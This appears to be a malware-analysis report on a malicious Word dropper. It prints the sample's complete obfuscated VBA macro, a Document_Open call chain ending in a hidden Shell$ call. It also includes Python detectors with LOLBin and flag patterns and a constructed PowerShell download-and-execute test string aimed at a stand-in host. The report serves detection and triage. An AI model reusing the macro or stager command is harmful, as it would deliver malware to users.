Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3442199a6adb335a…

MALICIOUS

Office (OLE)

Size: 207.5 KB
Created: 2017-05-22 08:00:00
Authoring application: Microsoft Office Word
First seen: 2017-05-29
MD5: 47685ddea86710c3d458f3e1337d0901
SHA-1: 0503c46bd92e6cf2e454c0d8220cad32b278f5a9
SHA-256: 3442199a6adb335a94a280cdebed451c46df3db871ca6e339180e9764dc22a14
Risk score: 232

Malware Insights

MITRE ATT&CK
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059.001 Command and Scripting Interpreter: PowerShell

The sample is a Word document whose VBA project fires on open: Document_Open enters a chain of more than 200 procedures with randomly generated names, each containing a single Call to the next. The last procedure runs Shell$ with window style 0 (vbHide), so nothing is shown to the user. The command line itself does not appear in the VBA: it is read at runtime from the document's built-in Company property (ActiveDocument.BuiltInDocumentProperties("COMpAnY").Value). That is why the LOLBin finding comes from the extracted document text rather than the macro source, and why the decoded macro shown below contains no PowerShell string of its own. A PowerShell reference sitting next to a dangerous flag, command verb or URL is consistent with a stager that downloads and executes a second-stage payload, and the ClamAV name Doc.Dropper.Agent-6328746-0 points the same way. To recover the actual command, read the Company property from the OLE DocumentSummaryInformation stream (for example olefile.OleFileIO(path).get_metadata().company) rather than relying on the macro source alone; until that string is in hand, specific flags such as an execution-policy bypass should be treated as unconfirmed.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6328746-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6328746-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Function uhqppacmie() As Object
    Call Shell$(ActiveDocument.BuiltInDocumentProperties("COMpAnY").Value, 0)
    End Function
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Option Explicit
    Static Sub doCUMENt_Open(): Call jubblyqldu: End Sub
    Static Function jubblyqldu() As Long
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/drawingml/2006/main  In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography  In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml  In document text (OLE body)
    All three are standard OOXML XML-namespace identifiers that Word embeds in its own parts; they are not network indicators and should not be added to blocklists.
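The SE_LOLBIN_RUN_COMMAND heuristic above is a proximity rule: a script or execution tool name near a dangerous flag, command verb or URL. The following is an added example of such a rule, written for this page and not the report's own detection code. The 220-character window is taken from the heuristic's description; the tool and trigger lists are my own reading of common stagers; the three input strings are constructed test vectors, not the command recovered from this document.

```python
"""Added example, not the report's own detection code: a proximity rule of
the kind SE_LOLBIN_RUN_COMMAND describes, run over constructed text.
Assumptions: the 220-character window comes from the heuristic text; the
tool and trigger lists are my own reading of common stagers; the sample
strings are constructed test vectors, not the command recovered from this
document."""
import re

WINDOW = 220  # characters either side of a tool name, per the heuristic text
TOOL_RE = re.compile(
    r"(?<![\w.])(?:powershell|pwsh|mshta|cmd|rundll32|regsvr32|wscript|cscript"
    r"|certutil|bitsadmin)(?:\.exe)?(?!\w)", re.I)
# Any one of these is common in benign text; the signal is proximity to a tool name.
TRIGGER_RE = re.compile(
    r"(?:-(?:nop|noprofile|w(?:indowstyle)?\s+hidden|e(?:p|xecutionpolicy)\s+bypass"
    r"|enc(?:odedcommand)?|c(?:ommand)?)\b"
    r"|\b(?:iex|invoke-expression|downloadstring|downloadfile|invoke-webrequest"
    r"|start-process|urlcache)\b"
    r"|https?://\S+)", re.I)

# Constructed test vectors (not text from this sample).
LURE_TEXT = ("Please enable content. powershell -nop -w hidden -ep bypass -c "
             "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')")
MSHTA_TEXT = "mshta http://example.invalid/a.hta"
BENIGN_TEXT = "Open PowerShell and run Get-Help for documentation."
FAR_TEXT = "cmd " + "x" * 230 + " http://example.invalid/doc"  # URL outside the window


def find_run_commands(text, window=WINDOW):
    """Return (tool, trigger, region) for each tool name that has a dangerous
    flag, command verb or URL within `window` characters; [] for clean text."""
    hits = []
    for tool in TOOL_RE.finditer(text):
        lo, hi = max(0, tool.start() - window), min(len(text), tool.end() + window)
        region = text[lo:hi]
        trigger = TRIGGER_RE.search(region)
        if trigger:
            hits.append((tool.group(0), trigger.group(0), region.strip()))
    return hits


if __name__ == "__main__":
    samples = (("lure", LURE_TEXT), ("mshta", MSHTA_TEXT),
               ("benign", BENIGN_TEXT), ("far", FAR_TEXT))
    for label, sample in samples:
        print(label, find_run_commands(sample))
```

Run it against the text olevba or a document-text extractor hands you; the benign and far-apart cases show why the window matters: a tool name alone, or a URL 230 characters away from it, produces no hit.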

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12592 bytes
SHA-256: a919210eb96e9a962136f9a59e696b3f11cf1a167187e2fcb76d54a4d5dafced
Detection
ClamAV: No threats found (the Doc.Dropper signature above fired on the container, not on the decoded macro source)
Obfuscation or payload: likely
142 of 239 identifiers look randomly generated (e.g. 'hbjdnoiblw'), consistent with name-mangling obfuscation. Every procedure body is a single Call statement, so the chain is padding between Document_Open and the Shell$ sink; the only payload-bearing line is the final Shell$ call, whose argument is read from the Company document property.
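The two things worth automating from this artifact are collapsing the trampoline chain to its sink and scoring identifier randomness. Below is an added example that does both; it is not part of the original report and not oletools code. It assumes the VBA is already decoded (olevba output such as macros.bas above). SAMPLE_VBA is a constructed, shortened stand-in with the same shape as the real 640-line macro, the regexes are a triage heuristic rather than a VBA parser, and the randomness rule (vowel ratio, consonant runs, a 'q' not followed by 'u') is my own assumption, not the rule the report used.

```python
"""Added example, not part of the original report or of oletools: collapse
an obfuscated VBA call chain to its execution sink and score identifier
randomness. Assumes decoded VBA text (olevba output such as macros.bas).
SAMPLE_VBA is a constructed, shortened stand-in for the 640-line macro,
and the regexes are a triage heuristic, not a VBA parser."""
import re

# Constructed stand-in with the sample's shape: Document_Open, single-Call
# trampolines, then Shell$ fed from a document property.
SAMPLE_VBA = """Option Explicit
Static Sub doCUMENt_Open(): Call jubblyqldu: End Sub
Static Function jubblyqldu() As Long
Call knpuykrnzq
End Function
Sub knpuykrnzq()
Call owqxouljae
End Sub
Function owqxouljae() As Object
Call uhqppacmie
End Function
Function uhqppacmie() As Object
Call Shell$(ActiveDocument.BuiltInDocumentProperties("COMpAnY").Value, 0)
End Function
"""

PROC_RE = re.compile(r"(?:Private\s+|Public\s+|Static\s+)*(?:Sub|Function)\s+([A-Za-z_]\w*)", re.I)
END_RE = re.compile(r"End\s+(?:Sub|Function)\b", re.I)
CALL_RE = re.compile(r"Call\s+([A-Za-z_]\w*)", re.I)
BARE_RE = re.compile(r"([A-Za-z_]\w*)\s*$")  # implicit call: a bare procedure name
SINK_RE = re.compile(r"\b(?:Shell\$?|CreateObject|GetObject|ShellExecute)\s*\(", re.I)
PROPERTY_RE = re.compile(r"(?:BuiltIn|Custom)DocumentProperties", re.I)
VOWELS = set("aeiou")


def split_statements(line):
    """Split a VBA line on ':' separators outside string literals (an even
    number of '"' must follow the colon to the end of the line)."""
    return [s.strip() for s in re.split(r':(?=(?:[^"]*"[^"]*")*[^"]*$)', line) if s.strip()]


def parse_procedures(src):
    """Map lower-cased procedure name -> {"name": as declared, "body": [statements]}."""
    procs, current = {}, None
    for line in src.splitlines():
        for stmt in split_statements(line):
            decl = PROC_RE.match(stmt)
            if decl:
                current = decl.group(1).lower()
                procs[current] = {"name": decl.group(1), "body": []}
            elif END_RE.match(stmt):
                current = None
            elif current is not None:
                procs[current]["body"].append(stmt)
    return procs


def find_sink_path(procs, entry="document_open"):
    """Depth-first walk of the call graph from the entry point. Returns
    (path, statement) for the first execution sink reached, else None.
    Recursion depth equals chain length (about 210 in the real sample)."""
    def walk(name, path, seen):
        if name not in procs or name in seen:
            return None
        seen.add(name)
        path = path + [name]
        for stmt in procs[name]["body"]:
            if SINK_RE.search(stmt):
                return path, stmt
        for stmt in procs[name]["body"]:
            m = CALL_RE.match(stmt) or BARE_RE.match(stmt)
            hit = walk(m.group(1).lower(), path, seen) if m else None
            if hit:
                return hit
        return None
    return walk(entry.lower(), [], set())


def looks_random(name):
    """Name-mangling heuristic (my assumption, not the report's rule): a long
    all-lower-case alphabetic name with few vowels, a run of four or more
    consonants, or a 'q' not followed by 'u' is unlikely to be human-chosen."""
    if len(name) < 8 or not name.isalpha() or not name.islower():
        return False
    vowel_ratio = sum(c in VOWELS for c in name) / len(name)
    longest_run = max((len(r) for r in re.findall(r"[^aeiou]+", name)), default=0)
    return vowel_ratio <= 0.3 or longest_run >= 4 or re.search(r"q(?!u)", name) is not None


def triage(src):
    procs = parse_procedures(src)
    hit = find_sink_path(procs)
    return {
        "procedures": len(procs),
        "random_identifiers": sum(looks_random(p["name"]) for p in procs.values()),
        "sink_path": hit[0] if hit else [],
        "sink": hit[1] if hit else None,
        # True when the command line is pulled from document metadata at runtime.
        "argument_from_doc_property": bool(hit and PROPERTY_RE.search(hit[1])),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

Feed it the real macros.bas and the sink path will be the 211-procedure chain ending in uhqppacmie; the argument_from_doc_property flag is the cue to go to the OLE metadata for the command line instead of grepping the VBA.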
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Static Sub doCUMENt_Open(): Call jubblyqldu: End Sub
Static Function jubblyqldu() As Long
Call knpuykrnzq
End Function
Sub knpuykrnzq()
Call owqxouljae
End Sub
Function owqxouljae() As Object
Call pbyqufggjl
End Function
Sub pbyqufggjl()
Call dmijdeegmm
End Sub
Private Sub dmijdeegmm()
Call iemqwmiiti
End Sub
Private Sub iemqwmiiti()
Call ypsdvjuhox
End Sub
Private Sub ypsdvjuhox()
Call oontzhmunf
End Sub
Static Sub oontzhmunf()
Call ywafkjxoqg
End Sub
Function ywafkjxoqg() As Single
Call inuaimdohd
End Function
Static Sub inuaimdohd()
Call lbexrxhrxr
End Sub
Function lbexrxhrxr() As Single
Call otmktgwtmz
End Function
Function otmktgwtmz() As Object
Call bifwvgfaea
End Function
Private Sub bifwvgfaea()
Call pzpfyfnzgw
End Sub
Private Function pzpfyfnzgw() As Double
Call fodlqclfqk
End Function
Static Sub fodlqclfqk()
Call dleegriqks
End Sub
Static Sub dleegriqks()
Call nyzjjuerdt
End Sub
Sub nyzjjuerdt()
Call fozgspoppp
End Sub
Static Sub fozgspoppp()
Call ifrwtzezud
End Sub
Private Function ifrwtzezud() As Single
Call uwglhayyem
End Function
Sub uwglhayyem()
Call afcjnigtwo
End Sub
Private Function afcjnigtwo() As String
Call efwcqqfjii
End Function
Private Sub efwcqqfjii()
Call mnoulvbetx
End Sub
Static Function mnoulvbetx() As Currency
Call tjvombemif
End Function
Static Sub tjvombemif()
Call czymifkuqg
End Sub
Static Sub czymifkuqg()
Call doemcrapxc
End Sub
Sub doemcrapxc()
Call yzznhjpncr
End Sub
Function yzznhjpncr() As Date
Call azznvuaewy
End Function
Function azznvuaewy() As String
Call fmddtctgea
End Function
Private Function fmddtctgea() As Boolean
Call lazrtjlavw
End Function
Private Function lazrtjlavw() As Boolean
Call smzchpscwk
End Function
Static Sub smzchpscwk()
Call ihmysmahft
End Sub
Static Sub ihmysmahft()
Call kqtityfenu
End Sub
Sub kqtityfenu()
Call bojsntmqep
End Sub
Static Sub bojsntmqep()
Call vdnmkmmvzd
End Sub
Function vdnmkmmvzd() As Byte
Call gcsojobjol
End Function
Function gcsojobjol() As Double
Call diaqletzwn
End Function
Private Sub diaqletzwn()
Call zggokvdkyi
End Sub
Sub zggokvdkyi()
Call zlkkcijayx
End Sub
Static Function zlkkcijayx() As Double
Call fphrophwse
End Function
Static Sub fphrophwse()
Call zsslsjmhah
End Sub
Static Function zsslsjmhah() As Currency
Call zpoyxvxqmc
End Function
Static Function zpoyxvxqmc() As Currency
Call lxvdywwkhr
End Function
Private Function lxvdywwkhr() As Boolean
Call fuhhiprvrz
End Function
Sub fuhhiprvrz()
Call cfxdcfutob
End Sub
Private Sub cfxdcfutob()
Call hbjdnoiblw
End Sub
Private Sub hbjdnoiblw()
Call gkvsxbaybl
End Sub
Static Sub gkvsxbaybl()
Call unybuadsps
End Sub
Static Sub unybuadsps()
Call nurprutknu
End Sub
Function nurprutknu()
Call xptehyjrup
End Function
Static Function xptehyjrup() As Variant
Call ibjdbztsfe
End Function
Function ibjdbztsfe() As Currency
Call lxajwjtbjm
End Function
Function lxajwjtbjm() As Date
Call hlyxjahfwn
End Function
Private Function hlyxjahfwn() As Object
Call vgqafzalni
End Function
Private Function vgqafzalni() As Single
Call mjgatvrxdy
End Function
Private Function mjgatvrxdy() As Variant
Call kkpmbkzonf
End Function
Private Function kkpmbkzonf() As Integer
Call cvqtqfznah
End Function
Sub cvqtqfznah()
Call upykravscc
End Sub
Sub upykravscc()
Call gfwcecqzcq
End Sub
Private Sub gfwcecqzcq()
Call ratkkdvgby
End Sub
Private Sub ratkkdvgby()
Call givkbbizoa
End Sub
Static Sub givkbbizoa()
Call cbtpisgdaw
End Sub
Private Sub cbtpisgdaw()
Call atvrdhtovj
End Sub
Static Sub atvrdhtovj()
Call zigwhvvkkt
End Sub
Private Function zigwhvvkkt() As String
Call rxpxpqgqnt
End Function
Static Sub rxpxpqgqnt()
Call sqdqcchskp
End Sub
Static Sub sqdqcchskp()
Call wzetrlboke
End Sub
Private Function wzetrlboke() As Currency
Call qthejeksem
End Function
Function qthejeksem() As Variant
Call eesxsdjsho
End Function
Static Sub eesxsdjsho()
Call qhbmzexndi
End Sub
Sub qhbmzexndi()
Call hsgzyakmyw
End Sub
Static Function hsgzyakmyw() As Variant
Call pgxhofqgig
End Function
Private Sub pgxhofqgig()
Call gzoaobntag
End Sub
Function gzoaobntag() As Long
Call qqiwmestrc
End Function
Static Sub qqiwmestrc()
Call tdssuoxwhq
End Sub
Function tdssuoxwhq() As Long
Call wwbfxymywz
End Function
Private Sub wwbfxymywz()
Call jltrzyvfoa
End Sub
Private Function jltrzyvfoa() As Long
Call ycdbcwdeqw
End Function
Function ycdbcwdeqw() As Date
Call nrrhuubkbj
End Function
Static Sub nrrhuubkbj()
Call loszjjyuus
End Sub
Private Sub loszjjyuus()
Call oqjwytidyv
End Sub
Static Function oqjwytidyv() As Boolean
Call oqnbwgetzp
End Function
Function oqnbwgetzp()
Call jxajiyikpe
End Function
Private Sub jxajiyikpe()
Call czuhlsodol
End Sub
Sub czuhlsodol()
Call iiqeqzwyhn
End Sub
Private Function iiqeqzwyhn() As Date
Call milyuivoti
End Function
Private Function milyuivoti() As Byte
Call uqcppnridx
End Function
Static Function uqcppnridx() As Integer
Call bmjkqtuqsf
End Function
Private Sub bmjkqtuqsf()
Call driaxeoglh
End Sub
Sub driaxeoglh()
Call lrshgjquhc
End Sub
Static Function lrshgjquhc() As Currency
Call gbojlbfsmq
End Function
Private Sub gbojlbfsmq()
Call icnizmqigy
End Sub
Static Function icnizmqigy() As Boolean
Call genribxszb
End Function
Private Sub genribxszb()
Call tdnnwbbfgw
End Sub
Private Sub tdnnwbbfgw()
Call bpnxlgihgk
End Sub
Static Function bpnxlgihgk()
Call qjauweqmps
End Function
Private Sub qjauweqmps()
Call sthdwpvjxu
End Sub
Sub sthdwpvjxu()
Call jrxnqlcvpp
End Sub
Static Function jrxnqlcvpp() As String
Call dgbioebakd
End Function
Sub dgbioebakd()
Call hubbynfvjm
End Sub
Sub hubbynfvjm()
Call mlolovjegn
End Sub
Private Sub mlolovjegn()
Call hivkonspii
End Sub
Private Function hivkonspii() As Single
Call hoyggazfjx
End Function
Static Sub hoyggazfjx()
Call ghredoling
End Sub
Private Sub ghredoling()
Call hvghvaclkh
End Sub
Static Function hvghvaclkh()
Call hrctbnnvwc
End Function
Static Sub hrctbnnvwc()
Call uzjzcompsr
End Sub
Private Sub uzjzcompsr()
Call nxvdmhhabz
End Sub
Sub nxvdmhhabz()
Call khlygxkyza
End Sub
Private Function khlygxkyza()
Call pdxyrfygvw
End Function
Sub pdxyrfygvw()
Call onjobtqdlk
End Sub
Private Sub onjobtqdlk()
Call cpmxystxar
End Sub
Private Sub cpmxystxar()
Call wwfluljoxt
End Sub
Function wwfluljoxt() As Byte
Call fshzlpzwep
End Function
Sub fshzlpzwep()
Call rexyeqjwpd
End Sub
Sub rexyeqjwpd()
Call taoezbjftl
End Sub
Function taoezbjftl() As Long
Call jeilyzlrro
End Function
Private Function jeilyzlrro() As Double
Call djfvjrqqyi
End Function
Private Sub djfvjrqqyi()
Call vmuwxnhbox
End Sub
Static Function vmuwxnhbox() As Date
Call sndhfcptxf
End Function
Private Function sndhfcptxf() As Byte
Call lyeouxprkg
End Function
Static Sub lyeouxprkg()
Call dsmfvslwmc
End Sub
Static Sub dsmfvslwmc()
Call hxfpsaulxr
End Sub
Sub hxfpsaulxr()
Call sscyzczswa
End Sub
Sub sscyzczswa()
Call okjgetydza
End Sub
Private Sub okjgetydza()
Call kehklkwhlv
End Sub
Private Function kehklkwhlv()
Call blfesgxaqk
End Function
Static Function blfesgxaqk() As Boolean
Call iluslnkovs
End Function
Private Function iluslnkovs() As Date
Call tpzkepkbiv
End Function
Sub tpzkepkbiv()
Call asrlfuxxup
End Sub
Static Sub asrlfuxxup()
Call ectovdrtud
End Sub
Private Sub ectovdrtud()
Call yvwzmwaxom
End Sub
Function yvwzmwaxom() As Boolean
Call mhgswvzxrn
End Function
Private Sub mhgswvzxrn()
Call szkzodcyyj
End Sub
Private Sub szkzodcyyj()
Call ikqmnzoyty
End Sub
Static Sub ikqmnzoyty()
Call xilcsxgksf
End Sub
Private Function xilcsxgksf()
Call hryodarevh
End Function
Sub hryodarevh()
Call ytwrpwixcc
End Sub
Function ytwrpwixcc() As Date
Call bggoygnarq
End Function
Sub bggoygnarq()
Call eypbaqccgz
End Sub
Sub eypbaqccgz()
Call lddfnwzqjb
End Sub
Static Sub lddfnwzqjb()
Call gfrwgotiav
End Sub
Function gfrwgotiav() As Long
Call pjbujtfwwl
End Function
Static Function pjbujtfwwl() As Boolean
Call ngcnyicgpt
End Function
Private Function ngcnyicgpt() As Variant
Call wsxrclyhiu
End Function
Static Function wsxrclyhiu() As String
Call wtbxayuyjp
End Function
Static Function wtbxayuyjp() As Long
Call raofmqypze
End Function
Sub raofmqypze()
Call kbicokeiyl
End Sub
Function kbicokeiyl() As Integer
Call qkeaurmdrn
End Function
Static Sub qkeaurmdrn()
Call naulihzanj
End Sub
Function naulihzanj() As Object
Call ctqltfhnow
End Function
Static Sub ctqltfhnow()
Call joxftlkvcf
End Sub
Private Function joxftlkvcf() As Long
Call luwvbwekvh
End Function
Function luwvbwekvh() As Date
Call utgdkagzrc
End Function
Static Function utgdkagzrc() As Integer
Call oeceptvxxq
End Function
Private Sub oeceptvxxq()
Call juwwnluubz
End Sub
Function juwwnluubz() As Variant
Call phbmmtnwja
End Function
Static Function phbmmtnwja() As Date
Call bfbiatrkqv
End Function
Private Sub bfbiatrkqv()
Call jsbtoyylqj
End Sub
Private Function jsbtoyylqj() As Double
Call zmoqavfras
End Function
Private Function zmoqavfras() As Byte
Call awvzahlniu
End Function
Static Sub awvzahlniu()
Call ruljudszzo
End Sub
Private Function ruljudszzo() As Single
Call ujlsomyvtt
End Function
Static Function ujlsomyvtt() As Date
Call fiqunpojhb
End Function
Static Sub fiqunpojhb()
Call cozwpegzqd
End Sub
Sub cozwpegzqd()
Call ymfupvpkry
End Sub
Static Function ymfupvpkry() As Double
Call fcnyvbhthm
End Function
Function fcnyvbhthm() As Double
Call evgxsquwlv
End Function
Sub evgxsquwlv()
Call ejvalckzjw
End Sub
Private Function ejvalckzjw() As Byte
Call ffrmqpwjvr
End Function
Private Function ffrmqpwjvr() As Byte
Call rnyrrpvcqg
End Function
Private Function rnyrrpvcqg() As Byte
Call lljvbjpozo
End Function
Private Sub lljvbjpozo()
Call ivarvztlxp
End Sub
Function ivarvztlxp() As Byte
Call mrmrghhuul
End Function
Static Sub mrmrghhuul()
Call mbygrvyrkz
End Sub
Sub mbygrvyrkz()
Call ttxhzapsji
End Sub
Function ttxhzapsji()
Call tkudknrcwi
End Function
Static Function tkudknrcwi() As Integer
Call cgwsarhkde
End Function
Function cgwsarhkde() As Variant
Call hhhifzgryu
End Function
Static Sub hhhifzgryu()
Call rodxpdrtsa
End Sub
Static Function rodxpdrtsa() As Object
Call gsxdnatfpd
End Function
Static Function gsxdnatfpd()
Call umpgjamlhy
End Function
Static Function umpgjamlhy() As Date
Call sajomoppmm
End Function
Function sajomoppmm() As Long
Call qbsauexgwu
End Function
Function qbsauexgwu() As Variant
Call bbozufmmtx
End Function
Private Sub bbozufmmtx()
Call agbykttkkr
End Sub
Private Sub agbykttkkr()
Call eluiicczvg
End Sub
Static Function eluiicczvg() As Currency
Call qgrqoehgup
End Function
Private Sub qgrqoehgup()
Call fouqfcuyiq
End Sub
Static Sub fouqfcuyiq()
Call iswdblevjk
End Sub
Function iswdblevjk() As Byte
Call zzuxhhgnpz
End Function
Sub zzuxhhgnpz()
Call fzjkaotcth
End Sub
Function fzjkaotcth() As Long
Call qdnctqtpgk
End Function
Private Sub qdnctqtpgk()
Call yggevvflse
End Sub
Private Sub yggevvflse()
Call cqhhlfzhts
End Sub
Private Function cqhhlfzhts() As Double
Call wjkscyjlnb
End Function
Static Function wjkscyjlnb() As String
Call kvvllwhlpc
End Function
Static Sub kvvllwhlpc()
Call pnzsdekmwy
End Sub
Static Sub pnzsdekmwy()
Call gyffdbwmrn
End Sub
Private Sub gyffdbwmrn()
Call vxavhzpyqu
End Sub
Function vxavhzpyqu() As Byte
Call ffmgsbzstw
End Function
Private Function ffmgsbzstw() As Long
Call whlkfyrlar
End Function
Sub whlkfyrlar()
Call sjqyypkvbg
End Sub
Static Sub sjqyypkvbg()
Call cmetqrkqfo
End Sub
Private Sub cmetqrkqfo()
Call irsxdyieiq
End Sub
Static Function irsxdyieiq() As String
Call etgpvqcwzk
End Function
Static Function etgpvqcwzk() As Single
Call mxqnyunkua
End Function
Sub mxqnyunkua()
Call kurfnjkuoi
End Sub
Function kurfnjkuoi() As Date
Call ugmkrmgvgj
End Function
Private Function ugmkrmgvgj() As Single
Call uhqppacmie
End Function
Function uhqppacmie() As Object
Call Shell$(ActiveDocument.BuiltInDocumentProperties("COMpAnY").Value, 0)
End Function